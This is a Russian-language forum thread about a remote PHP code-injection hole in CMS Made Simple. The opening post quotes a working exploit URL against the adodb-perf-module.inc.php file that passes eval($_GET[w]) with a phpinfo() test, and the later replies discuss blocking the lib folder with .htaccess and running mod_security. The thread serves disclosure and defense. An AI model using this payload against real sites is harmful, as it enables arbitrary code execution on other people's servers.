Warning ! Topic is solved

Обсуждение CMS Made Simple в России.

Moderators: iturbay, wdwp

Post Reply
net0

Warning !

Post by net0 »

Использую cmsmadesimple на многих сайтах.

Давеча получил по аське от доброго человека сообщение:
"Привет,
http://www.мой_сайт.ru//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
дыра позволяет выполнить любой php код"

Похоже на пхп-инъекцию. Проверил - работает.:(
ZYV
Language Partners
Language Partners
Posts: 868
Joined: Tue Nov 15, 2005 9:08 pm

Re: Warning !

Post by ZYV »

Вообще-то нормальные люди кладут в lib .htaccess с deny from all, ибо на то оно и lib, что не должно быть доступно на выполнение через веб-сервер. Но вот к моему большому сожалению, общей практикой это не является.
unsigned double ZYV;
MASSER

Re: Warning !

Post by MASSER »

ZYV wrote: Вообще-то нормальные люди кладут в lib .htaccess с deny from all, ибо на то оно и lib, что не должно быть доступно на выполнение через веб-сервер. Но вот к моему большому сожалению, общей практикой это не является.
Imho, было бы правильней, если бы разработчики его туда сами поместили. А то, мало ли какие грабли потом вылезут.
ilia3d

Re: Warning !

Post by ilia3d »

ZYV wrote: Вообще-то нормальные люди кладут в lib .htaccess с deny from all, ибо на то оно и lib, что не должно быть доступно на выполнение через веб-сервер. Но вот к моему большому сожалению, общей практикой это не является.
Т.е. просто создать файлик с этой строчкой "deny from all"?
ZYV
Language Partners
Language Partners
Posts: 868
Joined: Tue Nov 15, 2005 9:08 pm

Re: Warning !

Post by ZYV »

Да, я согласен, но у меня не было времени побеседовать с Тедом на тему безопасности. Очень с ним вообще тяжело в последнее время (временем).

Нет, Илья, если просто кинешь - нарушишь работу некоторых функций (увидишь сам). Я кладу что-то в стиле

order allow,deny

deny from all
Но, конечно, во-первых, список может быть расширен, во-вторых, во все папки где доступ не нужен вообще типа plug-ins - просто deny from all для всех. Кстати, сильно помогает ;-) против лошков. Но я вообще в этом плане параноик - у меня mod_security & ids'ы везде крутятся... На всякий.
unsigned double ZYV;
Post Reply

Return to “Russian - русский”